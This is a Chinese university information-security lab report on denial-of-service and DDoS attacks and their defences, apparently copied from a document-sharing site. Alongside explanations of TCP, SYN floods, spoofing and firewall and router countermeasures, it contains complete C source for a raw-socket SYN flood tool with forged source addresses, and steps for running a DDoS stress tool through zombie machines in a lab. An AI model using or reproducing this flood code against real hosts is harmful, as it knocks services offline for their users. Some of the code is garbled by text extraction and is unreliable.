版權(quán)說(shuō)明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡(jiǎn)介
1、精選優(yōu)質(zhì)文檔-傾情為你奉上貴州大學(xué)實(shí)驗(yàn)報(bào)告學(xué)院:計(jì)算機(jī)科學(xué)與技術(shù)學(xué)院 專業(yè):信息安全 班級(jí):姓名學(xué)號(hào)實(shí)驗(yàn)組實(shí)驗(yàn)時(shí)間2015.06.17指導(dǎo)教師蔣朝惠成績(jī)實(shí)驗(yàn)項(xiàng)目名稱實(shí)驗(yàn)十 拒絕服務(wù)攻擊與防范實(shí)驗(yàn)?zāi)康模ㄒ唬?拒絕服務(wù)(DoS)攻擊與防范通過(guò)本實(shí)驗(yàn)的學(xué)習(xí), 使大家了解拒絕服務(wù)攻擊的原理以及相應(yīng)的防范方法。通過(guò)一個(gè)SYN Flood的拒絕服務(wù)程序, 使大家加強(qiáng)對(duì)Dos攻擊的理解。(二) 分布式服務(wù)(DDoS)攻擊與防范通過(guò)本實(shí)驗(yàn)的學(xué)習(xí), 使大家了解分布式拒絕服務(wù)(DDoS)攻擊的原理以及相應(yīng)的防范方法。實(shí)驗(yàn)要求通過(guò)實(shí)驗(yàn),理解和掌握DoS和DDoS的攻擊原理以及相應(yīng)的防范方法實(shí)驗(yàn)原理(一) 拒絕服務(wù)(
2、DoS)攻擊與防范1. TCP協(xié)議介紹傳輸控制協(xié)議是用來(lái)在不可靠的Internet上提供可靠的、端到端的字節(jié)流通信協(xié)議,在FRC 793中有正式定義,還有一些解決錯(cuò)誤的方案在RFC1122中有記錄,RFC1323則有TCP的功能擴(kuò)展。常見(jiàn)到的TCP/IP協(xié)議中,IP層不保證將數(shù)據(jù)報(bào)正確傳輸?shù)侥康牡豑CP則從本地機(jī)器接收用戶的數(shù)據(jù)流,將其分成不超過(guò)64KB的數(shù)據(jù)字段,將每個(gè)數(shù)據(jù)片段作為單獨(dú)的IP數(shù)據(jù)包發(fā)送出去,最后在目的地機(jī)器中將其再組合成完整的字節(jié)流,TCP協(xié)議必須保證可靠性。發(fā)送方和接收方的TCP傳輸以數(shù)據(jù)段的形式交換數(shù)據(jù),i一個(gè)數(shù)據(jù)段包括固定20字節(jié),加上可選部分,后面再加上數(shù)據(jù)。TCP協(xié)
3、議從發(fā)送方傳輸一個(gè)數(shù)據(jù)耳朵時(shí)候,其中有一個(gè)確認(rèn)號(hào),它等于希望收到的下一個(gè)數(shù)據(jù)段的序號(hào),接收方還要發(fā)送回一個(gè)數(shù)據(jù)段,其中有一個(gè)確認(rèn)號(hào),它等于希望收到的下一個(gè)數(shù)據(jù)段的順序號(hào)。如果計(jì)時(shí)器在確認(rèn)信息到達(dá)以前超時(shí)了,發(fā)送方會(huì)重新發(fā)送這個(gè)數(shù)據(jù)段。從上面的內(nèi)容可以在總體上了解一點(diǎn)TCP,重要的是熟悉TCP的數(shù)據(jù)頭。因?yàn)閿?shù)據(jù)流的傳輸最重要的就是header里面的東西,至于發(fā)送的數(shù)據(jù),只是TCP數(shù)據(jù)頭附帶上的、客戶端和服務(wù)器端的服務(wù)響應(yīng)就是痛header里面的數(shù)據(jù)有關(guān),兩端信息交流和交換是根據(jù)header中內(nèi)容實(shí)施的,因此,要了解DoS攻擊原理,就必須對(duì)TCP的header中的內(nèi)容非常熟悉。有關(guān)TCP數(shù)據(jù)段頭格
4、式參見(jiàn)7.1.3節(jié)內(nèi)容。TCP連接采用“3次握手”,其原理步驟如下所述。在沒(méi)有連接時(shí),接受方服務(wù)器處于監(jiān)聽(tīng)狀態(tài),等待其它機(jī)器發(fā)送連接請(qǐng)求。第一步,客戶端發(fā)送一個(gè)帶SYN位的請(qǐng)求,向服務(wù)器表示需要連接。第二步,服務(wù)器接收到這樣的請(qǐng)求后,查看監(jiān)聽(tīng)的端口是否為指定端口,如果不是,則發(fā)送RST=1應(yīng)答,拒絕建立連接。如果是,那么服務(wù)器發(fā)送確認(rèn),SYN為服務(wù)器的一個(gè)內(nèi)碼,假設(shè)為100,ACK位則為客戶端的請(qǐng)求序號(hào)加1,本例中發(fā)送的數(shù)據(jù)是:SYN=11,ACK=100,用這樣的數(shù)據(jù)發(fā)送給客戶端。向客戶端標(biāo)明,服務(wù)器連接已準(zhǔn)備好,等待客戶端的確認(rèn)。這時(shí)客戶端接收到信息后,分析得到的信息,準(zhǔn)備發(fā)送確認(rèn)連接信號(hào)
5、到服務(wù)器。第三步,客戶端發(fā)送確認(rèn)信息建立連接的消息給服務(wù)器端,確認(rèn)信息的SYN位是服務(wù)器發(fā)送的ACK位,ACK位是服務(wù)器發(fā)送的SYN位加1.級(jí):SYN=11,ACK=101。這時(shí),連接已經(jīng)建立好了,可以進(jìn)行發(fā)送數(shù)據(jù)的過(guò)程。服務(wù)器不會(huì)在每次接收到SYN請(qǐng)求就立刻恢復(fù)客戶端建立連接,而是為連接請(qǐng)求分配內(nèi)存空間,建立會(huì)話,并放到一個(gè)隊(duì)列中。如果等待隊(duì)列已經(jīng)滿了,那么服務(wù)器就不會(huì)再為新的連接分配資源,直接丟棄請(qǐng)求。如果到了這種地步,那么服務(wù)器就是拒絕服務(wù)了。2. 拒絕服務(wù)(DoS)攻擊(1)DoS的基本概念DoS的英文全稱是denial of service,也就是“拒絕服務(wù)”的意思。從網(wǎng)絡(luò)攻擊的各種
6、方法和所產(chǎn)生的破壞情況來(lái)看,DOS算是一種很簡(jiǎn)單但又很有效的攻擊方式。它的目的就是拒絕服務(wù)訪問(wèn),破壞服務(wù)程序正常運(yùn)行,最終它會(huì)使部分Internet連接和網(wǎng)絡(luò)系統(tǒng)失效。DoS的攻擊方式有很多種,最基本的DoS攻擊就是利用合理的服務(wù)請(qǐng)求來(lái)占用過(guò)多的資源,從而使合法用戶無(wú)法得到服務(wù)。DoS攻擊的基本過(guò)程是:攻擊者向服務(wù)器發(fā)送眾多的帶有虛假地址請(qǐng)求,服務(wù)器發(fā)送回復(fù)請(qǐng)求后等待回傳信息,由于地址是偽造的,所以服務(wù)器一直等不到回傳的消息,分配給這次請(qǐng)求的資源就始終沒(méi)被釋放。當(dāng)服務(wù)器等待一段時(shí)間后,連接會(huì)因超時(shí)而唄切斷,攻擊者會(huì)再傳送一批新的請(qǐng)求,在這種反復(fù)發(fā)送偽地址請(qǐng)求的情況下,服務(wù)器資源會(huì)最終被耗盡。被
7、DOS攻擊事的現(xiàn)象大致有:被攻擊主機(jī)上有大量等待的TCP連接。被攻擊主機(jī)的系統(tǒng)資源被大量占用,造成系統(tǒng)停頓。網(wǎng)絡(luò)充斥著大量無(wú)用的數(shù)據(jù)包,源地址為偽造地址。大量無(wú)用數(shù)據(jù)使得網(wǎng)絡(luò)擁塞,受害主機(jī)無(wú)法與外界進(jìn)行通信。利用受害主機(jī)提供的服務(wù)或傳輸協(xié)議上的缺陷,反復(fù)高速地發(fā)送特定的服務(wù)請(qǐng)求,使受害主機(jī)無(wú)法及時(shí)處理所有正常請(qǐng)求,嚴(yán)重時(shí)會(huì)造成系統(tǒng)崩潰。(2)拒絕服務(wù)攻擊的基本方法要對(duì)服務(wù)器實(shí)現(xiàn)拒絕服務(wù)攻擊,實(shí)質(zhì)上有兩種方式:一是迫使服務(wù)器的緩沖區(qū)滿,不接受新的請(qǐng)求;二是使用IP欺騙,迫使服務(wù)器把合法的連接復(fù)位,影響合法用戶的連接。這就是DoS攻擊實(shí)施的基本思想。具體實(shí)現(xiàn)有一下幾種方法:SNY Flood。編寫(xiě)
8、發(fā)包程序,設(shè)置TCP的Header,向服務(wù)器端不斷成倍地發(fā)送只有SYN標(biāo)志的TCP請(qǐng)求。當(dāng)服務(wù)器接收的時(shí)候,都認(rèn)為是沒(méi)有建立起來(lái)的連接請(qǐng)求,于是為這些請(qǐng)求建立會(huì)話,排到緩沖隊(duì)列中。如果SYN請(qǐng)求超過(guò)了服務(wù)器能容納的限度,緩沖區(qū)隊(duì)列占滿,那么服務(wù)器就不再接收新請(qǐng)求了,其他合法用戶的連接都被拒絕掉。IP欺騙DoS攻擊。這種攻擊利用RST位來(lái)實(shí)現(xiàn)。假設(shè)現(xiàn)在只有有一個(gè)合法用戶()已經(jīng)同服務(wù)器建立了正常的連接,攻擊者構(gòu)造攻擊的TCP數(shù)據(jù),偽裝自己的IP為,并向服務(wù)器發(fā)送一個(gè)帶有RST位的TCP數(shù)據(jù)段。服務(wù)器接收到這樣的數(shù)據(jù)后。認(rèn)為從發(fā)送的連接錯(cuò)誤,就會(huì)清空緩沖區(qū)
9、中建好的連接。這時(shí)。如果合法用戶再發(fā)送合法數(shù)據(jù);服務(wù)器就已經(jīng)沒(méi)有這樣的連接了,該用戶就必須重新開(kāi)始建立連接。使用這種攻擊方式時(shí),需要偽造大量的IP地址,向目標(biāo)發(fā)送RST數(shù)據(jù),可以使服務(wù)器不對(duì)合法用戶服務(wù)。Smurf。廣播信息可以通過(guò)一定的手段發(fā)送到整個(gè)網(wǎng)絡(luò)機(jī)器中。當(dāng)某臺(tái)機(jī)器使用廣播地址發(fā)送一個(gè)ICMP echo 請(qǐng)求包時(shí),一些系統(tǒng)會(huì)回應(yīng)一個(gè)ICMP echo回應(yīng)包。自身消耗的DoS攻擊。這種DoS攻擊就是把請(qǐng)求數(shù)據(jù)包中的客戶端IP和端口設(shè)置成主機(jī)自己IP和端口,再發(fā)送給主機(jī),使得主機(jī)給自己發(fā)送TCP相應(yīng)和連接。這樣,主機(jī)就會(huì)很快把資源耗光,直接導(dǎo)致死機(jī)。這種偽裝攻擊對(duì)一些身份認(rèn)證
10、系統(tǒng)威脅巨大。塞滿服務(wù)器的硬盤。通常,如果服務(wù)器可以沒(méi)有限制地執(zhí)行寫(xiě)操作;那么通過(guò)一些手段就可以造成硬盤被寫(xiě)滿,從而拒絕服務(wù);比如發(fā)送垃圾郵件。合理利用策略。一般服務(wù)器都有關(guān)于賬戶鎖定的安全策略,比如某個(gè)賬戶連續(xù)3次登陸失敗,那么這個(gè)賬號(hào)將被鎖定。這點(diǎn)也可以被破壞者利用,他們偽裝一個(gè)賬號(hào)去錯(cuò)誤登陸,這樣使得這個(gè)賬號(hào)被鎖定,而正常的合法用戶就不能使用賬號(hào)去登陸系統(tǒng)了。(3)拒絕服務(wù)攻擊的防范到目前為止,防范DoS特別是DDoS攻擊仍比較困難。但仍然可以采取一些措施以降低其產(chǎn)生的危害。對(duì)中小型網(wǎng)站來(lái)說(shuō),可以從以下幾個(gè)方面進(jìn)行防范:主機(jī)設(shè)置。即加固操作系統(tǒng),對(duì)各操作系統(tǒng)參數(shù)進(jìn)行設(shè)置以加強(qiáng)系統(tǒng)穩(wěn)固性。
11、重新編譯或設(shè)置Linux以及操作各種BSD系統(tǒng)、Solaris等操作系統(tǒng)內(nèi)核中某些參數(shù),可在一定程度上提高系統(tǒng)的抗攻擊能力。例如,對(duì)于DoS攻擊的典型種類SYN Flood,它利用TCP/IP漏洞發(fā)送大量偽造的TCP連接請(qǐng)求,以造成網(wǎng)絡(luò)無(wú)法連接用戶服務(wù)或使操作系統(tǒng)癱瘓。該攻擊過(guò)程涉及系統(tǒng)的一下參數(shù):可等待的數(shù)據(jù)包的鏈接數(shù)和超時(shí)等待數(shù)據(jù)包的時(shí)間長(zhǎng)度。因此,則進(jìn)行如下設(shè)置:關(guān)閉不必要的服務(wù)。將數(shù)據(jù)包的鏈接數(shù)從默認(rèn)值128或512改為2048或更大,以家常每次處理數(shù)據(jù)包隊(duì)列的長(zhǎng)度;以緩解和消化更多數(shù)據(jù)包的連接。將連接超時(shí)時(shí)間設(shè)置得較短,以保證正常數(shù)據(jù)包的連接,屏蔽非法攻擊包。及時(shí)更新系統(tǒng)、安裝補(bǔ)丁。
12、防火墻設(shè)置。仍以SYN Flood為例,可以在在防火墻上進(jìn)行如下設(shè)置:禁止對(duì)主機(jī)非開(kāi)放服務(wù)的訪問(wèn)。限制同時(shí)打開(kāi)的數(shù)據(jù)包最大連接數(shù)。限制特定IP地址的訪問(wèn)。啟用防火墻的防DDoS的屬性。嚴(yán)格限制對(duì)外開(kāi)放服務(wù)器的向外訪問(wèn),以防止自己服務(wù)器被當(dāng)作工具攻擊他人。Random Drop算法。當(dāng)流量達(dá)到一定閥值時(shí),按照算法規(guī)則丟棄后續(xù)報(bào)文,以保持主機(jī)的處理能力。其不足是會(huì)誤丟正常的數(shù)據(jù)包,特別是在大流量數(shù)據(jù)包的攻擊下,正常數(shù)據(jù)包容易隨非法數(shù)據(jù)包被拒之網(wǎng)外。SYN Cookie算法。采用“六次握手”技術(shù)以降低受攻擊率。其不足是依據(jù)列表查詢,當(dāng)數(shù)據(jù)流量增大時(shí),列表急劇膨脹,計(jì)算量隨之提升,容易造成響應(yīng)延遲乃至
13、系統(tǒng)癱瘓。路由器設(shè)置。以CISCO路由器為例,可采取如下方法。Cisco Express Forwarding(CEF)。使用Unicasat reverse-path。訪問(wèn)控制列表(ACL)過(guò)濾。設(shè)置數(shù)據(jù)流量速率。升級(jí)版本過(guò)低的IOS。為路由器建立log server。不論防火墻還是路由器都是到外界的接口設(shè)備,在進(jìn)行防DDoS設(shè)置的同時(shí),要權(quán)衡可能犧牲的正常業(yè)務(wù)代價(jià),謹(jǐn)慎行事。利用負(fù)載均衡技術(shù)。就是把應(yīng)用業(yè)務(wù)分部到幾臺(tái)不同的服務(wù)器上。采用循環(huán)DNS服務(wù)或者硬件路由器技術(shù),將進(jìn)入系統(tǒng)的請(qǐng)求分流到多臺(tái)服務(wù)器上。這種方法要求投資較大,相應(yīng)的維護(hù)費(fèi)也高,中型網(wǎng)站如果有條件可以考慮。以上方法對(duì)流量小、
14、正對(duì)性強(qiáng)、結(jié)構(gòu)簡(jiǎn)單的DoS攻擊進(jìn)行防范還是很有效的。而對(duì)于DDoS攻擊,則需要能夠應(yīng)付大流量的防范措施和技術(shù),需要能夠綜合多種算法、集多種網(wǎng)絡(luò)設(shè)備功能的集成技術(shù)。(二) 分布式服務(wù)(DDoS)攻擊與防范1. DDoS的基本概念分布式拒絕服務(wù)攻擊時(shí)借助于客戶服務(wù)器技術(shù),將多個(gè)計(jì)算機(jī)聯(lián)合起來(lái)作為攻擊平臺(tái),對(duì)一個(gè)活活在多個(gè)目標(biāo)發(fā)動(dòng)攻擊,使成倍的增加攻擊能力。2. DDoS的攻擊原理(1) Smurf與Fraggle 將一個(gè)目的地址設(shè)置成廣播地址后,它就會(huì)被網(wǎng)絡(luò)中的所有主機(jī)接收并處理。其中Smurf是用廣播地址發(fā)送ICMP ECHO包,而Fraggle是用廣播地址發(fā)送UDP包。(2) trinoo 是
15、復(fù)雜的DDoS攻擊程序,它使用主控程序master對(duì)實(shí)際實(shí)施攻擊的任何數(shù)量的“代理”程序?qū)崿F(xiàn)自動(dòng)控制。(3) TFN2K 是一個(gè)使用master程序與位于多個(gè)網(wǎng)絡(luò)上的哦國(guó)內(nèi)國(guó)際代理進(jìn)行通信。(4) Stacheldraht 也是基于TFN的,采用C/S模式,其中master程序與潛在的成千上萬(wàn)個(gè)代理程序進(jìn)行通信。3. DDoS系統(tǒng)的一般結(jié)構(gòu)在更一般的情況下,DDoS可能使用多臺(tái)控制機(jī),形成一個(gè)攻擊結(jié)構(gòu)。4. DDoS的監(jiān)測(cè)(1) 根據(jù)異常情況分析(2) 使用DDoS檢測(cè)工具5. DDoS攻擊的防御策略實(shí)驗(yàn)儀器(一) 拒絕服務(wù)(DoS)攻擊與防范1. 安裝有Windows操作系統(tǒng)的PC,編輯工具
16、可選用VC+ 6.0。2. 由hub或交換機(jī)組成的有若干臺(tái)PC局域網(wǎng)。(二) 分布式服務(wù)(DDoS)攻擊與防范Windows server 2003,風(fēng)云壓力測(cè)試DDoS軟件,冰盾防火墻實(shí)驗(yàn)步驟、內(nèi)容、數(shù)據(jù)(一) 拒絕服務(wù)(DoS)攻擊與防范1. 在一個(gè)局域網(wǎng)環(huán)境中,根據(jù)實(shí)驗(yàn)內(nèi)容中提供的DoS程序,編寫(xiě)一個(gè)SYN Flood拒絕服務(wù)程序。使用自己編寫(xiě)的DoS程序攻擊實(shí)驗(yàn)室的一臺(tái)實(shí)驗(yàn)主機(jī),在實(shí)驗(yàn)主機(jī)上安裝一個(gè)網(wǎng)絡(luò)監(jiān)聽(tīng)工具(如tcpdump等),觀測(cè)DoS攻擊效果。2. 交自己編輯的SYN Flood拒絕服務(wù)攻擊程序猿代碼,并對(duì)代碼中的關(guān)鍵步驟添加注釋,通過(guò)網(wǎng)絡(luò)監(jiān)聽(tīng)工具觀測(cè)攻擊效果,并對(duì)實(shí)驗(yàn)結(jié)果進(jìn)
17、行分析。3. SYN Flood程序如下:#include #include #include #include #include #include #pragma comment(lib, ws2_32.lib)#define MAX_RECEIVEBYTE 255 typedef struct ip_head /定義IP首部 unsigned char h_verlen; /4位首部長(zhǎng)度,4位IP版本號(hào) unsigned char tos; /8位服務(wù)類型TOS unsigned short total_len; /16位總長(zhǎng)度(字節(jié)) unsigned short ident; /16位
18、標(biāo)識(shí) unsigned short frag_and_flags; /3位標(biāo)志位 (如SYN,ACK,等)unsigned char ttl; /8位生存時(shí)間 TTL unsigned char proto; /8位協(xié)議 (如ICMP,TCP等)unsigned short checksum; /16位IP首部校驗(yàn)和unsigned int sourceIP; /32位源IP地址unsigned int destIP; /32位目的IP地址 IPHEADER;typedef struct tcp_head /定義TCP首部 USHORT th_sport; /16位源端口 USHORT th_
19、dport; /16位目的端口 unsigned int th_seq; /32位序列號(hào) unsigned int th_ack; /32位確認(rèn)號(hào) unsigned char th_lenres; /4位首部長(zhǎng)度/6位保留字 unsigned char th_flag; /6位標(biāo)志位 USHORT th_win; /16位窗口大小 USHORT th_sum; /16位校驗(yàn)和 USHORT th_urp; /16位緊急數(shù)據(jù)偏移量 TCPHEADER; typedef struct tsd_head /定義TCP偽首部 unsigned long saddr; /源地址 unsigned lon
20、g daddr; /目的地址 char mbz; char ptcl; /協(xié)議類型 unsigned short tcpl; /TCP長(zhǎng)度 PSDHEADER;/CheckSum:計(jì)算校驗(yàn)和的子函數(shù) USHORT checksum(USHORT *buffer, int size) unsigned long cksum=0; while(size 1) cksum+=*buffer+;size -=sizeof(USHORT); if(size)cksum += *(UCHAR*)buffer; cksum = (cksum 16) + (cksum & 0xffff); cksum +=
21、(cksum 16);return (USHORT)(cksum); void usage() printf(*);printf(SYN_FLOOD MADE BY LionD8);printf(Useage: FLOOD Target_ip Target_port Delay_time );printf(*);/Delay_time單位為毫秒。int main(int argc, char* argv) WSADATA WSAData; SOCKET sock; SOCKADDR_IN addr_in;IPHEADER ipHeader;TCPHEADER tcpHeader;PSDHEAD
22、ER psdHeader;int SourcePort;char szSendBuf60=0;BOOL flag; int rect,nTimeOver;int sleeptime;usage();if (argc 4 ) printf(input error! );return false; if (argc=4) sleeptime=atoi(argv3); else sleeptime=300;if (WSAStartup(MAKEWORD(2,2), &WSAData)!=0) printf(WSAStartup Error!);return false;sock=NULL;if (s
23、ock=socket(AF_INET,SOCK_RAW,IPPROTO_IP)=INVALID_SOCKET)printf(Socket Setup Error!);return false;flag=true; if (setsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag)=SOCKET_ERROR) printf(setsockopt IP_HDRINCL error!);return false; nTimeOver=1000;if (setsockopt(sock, SOL_SOCKET, SO_SNDTIME
24、O, (char*)&nTimeOver, sizeof(nTimeOver)=SOCKET_ERROR) /設(shè)置發(fā)送的時(shí)間 printf(setsockopt SO_SNDTIMEO error!);return false; addr_in.sin_family=AF_INET; addr_in.sin_port=htons(atoi(argv2);addr_in.sin_addr.S_un.S_addr=inet_addr(argv1);while(TRUE)/填充IP首部 ipHeader.h_verlen=(44 | sizeof(ipHeader)/sizeof(unsigned
25、long);ipHeader.tos=0;ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(tcpHeader); /IP總長(zhǎng)度ipHeader.ident=1;ipHeader.frag_and_flags=0; /無(wú)分片ipHeader.ttl=(unsigned char)GetTickCount()%87+123; ipHto=IPPROTO_TCP; / 協(xié)議類型為 TCPipHeader.checksum=0; /效驗(yàn)位先初始為0ipHeader.sourceIP=htonl(GetTickCount()*); /隨
26、機(jī)產(chǎn)生一個(gè)偽造的IPipHeader.destIP=inet_addr(argv1); /目標(biāo)IP/填充TCP首部SourcePort=GetTickCount()*43557%9898; /隨機(jī)產(chǎn)生一個(gè)端口號(hào)tcpHeader.th_dport=htons(atoi(argv2); /發(fā)送的目的端口tcpHeader.th_sport=htons(SourcePort); /源端口號(hào)tcpHeader.th_seq=htonl(0x); /序列號(hào)tcpHeader.th_ack=0; /確認(rèn)號(hào)tcpHeader.th_lenres=(sizeof(tcpHeader)/44|0);tcpHe
27、ader.th_flag=2; /為SYN請(qǐng)求tcpHeader.th_win=htons(512);tcpHeader.th_urp=0;tcpHeader.th_sum=0;/填充TCP偽首部用來(lái)計(jì)算TCP頭部的效驗(yàn)和psdHeader.saddr=ipHeader.sourceIP;psdHeader.daddr=ipHeader.destIP;psdHeader.mbz=0; psdHeader.ptcl=IPPROTO_TCP;psdHeader.tcpl=htons(sizeof(tcpHeader);/計(jì)算校驗(yàn)和 memcpy(szSendBuf, &psdHeader, siz
28、eof(psdHeader); memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader); tcpHeader.th_sum=checksum(USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader); /把偽造好的IP頭 和 TCP 頭 放進(jìn) buf 準(zhǔn)備發(fā)送memcpy(szSendBuf, &ipHeader, sizeof(ipHeader);memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHea
29、der);/發(fā)送數(shù)據(jù)包rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader), 0, (struct sockaddr*)&addr_in, sizeof(addr_in);if (rect=SOCKET_ERROR) printf(send error!:%x,WSAGetLastError();return false;elseprintf(send ok!);Sleep(sleeptime); /根據(jù)自己網(wǎng)速的快慢確定此值,sleeptime越小發(fā)得越快/endwhile /重新偽造IP的源地址等再次向目標(biāo)發(fā)送clo
30、sesocket(sock);WSACleanup();return 0;4. 運(yùn)行代碼得到如下可執(zhí)行文件:5. 攻擊之前,將一臺(tái)web服務(wù)器的服務(wù)端口改為1234,如下:6. 訪問(wèn)上面的web服務(wù)器如下:7. DoS攻擊:8. 最后一個(gè)參數(shù)60,表示每60ms發(fā)送一次,回車后:9. 每60 ms顯示一個(gè)send ok!表示發(fā)送成功。DoS攻擊之后,訪問(wèn)之前的web服務(wù)器,出現(xiàn)如下情況:表明DOS攻擊成功?。ǘ?分布式服務(wù)(DDoS)攻擊與防范C1(攻擊者)上安裝DDoS客戶端程序,C2C6(傀儡機(jī))上安裝DDoS服務(wù)器端,C7(被攻擊者)上安裝啟用冰盾DDoS防火墻,C8(被攻擊者)上不使用防火墻。1. C1下載風(fēng)云壓力測(cè)試軟件,解壓后可看見(jiàn)目錄下有一生成器文件2. 單擊【生成版本】,生成客戶端和服務(wù)器端軟件3. 在裝服務(wù)器端Service.exe的計(jì)算機(jī)的host文件最后加入相應(yīng)域名的客戶機(jī)IP: 4. 在服務(wù)器(C2C6)裝上Service.exe,在客戶端C1裝上“風(fēng)云vip客戶端”。C1(攻擊者)單擊“開(kāi)始監(jiān)聽(tīng)”,攻擊目標(biāo)輸入C8(不使用防火墻)ip:35. 使用SYN
溫馨提示
- 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。
最新文檔
- 河南省駐馬店市汝南縣雙語(yǔ)學(xué)校、清華園學(xué)校2025-2026學(xué)年八年級(jí)上學(xué)期1月期末考試歷史試卷(含答案)
- 江蘇省蘇州市姑蘇區(qū)光華中學(xué)2025-2026學(xué)年七年級(jí)上學(xué)期期末測(cè)試歷史卷(含答案)
- 文秘試題及答案
- 網(wǎng)約車考試題庫(kù)及答案
- 2022~2023質(zhì)量員考試題庫(kù)及答案解析第117期
- 2021年部編人教版一年級(jí)語(yǔ)文上冊(cè)期中測(cè)試卷(1套)
- 公司實(shí)習(xí)總結(jié)15篇
- 營(yíng)口小升初數(shù)學(xué)綜合測(cè)試卷及參考答案
- 電氣設(shè)備選型技術(shù)要領(lǐng)
- 生理解剖考試題型及答案
- 2025年中國(guó)高考評(píng)價(jià)體系深度分析解讀課件
- AQ 3002-2005 阻隔防爆撬裝式汽車加油(氣)裝置技術(shù)要求
- 手衛(wèi)生規(guī)范與標(biāo)準(zhǔn)預(yù)防
- 胃癌術(shù)后快速康復(fù)的護(hù)理
- 馬工程社會(huì)學(xué)概論考試重點(diǎn)
- 鋼筋混凝土圓管涵圓管計(jì)算程序(2020規(guī)范)
- DL∕T 2340-2021 大壩安全監(jiān)測(cè)資料分析規(guī)程
- 《陸上風(fēng)電場(chǎng)工程概算定額》NBT 31010-2019
- GB/T 13789-2022用單片測(cè)試儀測(cè)量電工鋼帶(片)磁性能的方法
- GB/T 33092-2016皮帶運(yùn)輸機(jī)清掃器聚氨酯刮刀
- 中學(xué)主題班會(huì)課:期末考試應(yīng)試技巧點(diǎn)撥(共34張PPT)
評(píng)論
0/150
提交評(píng)論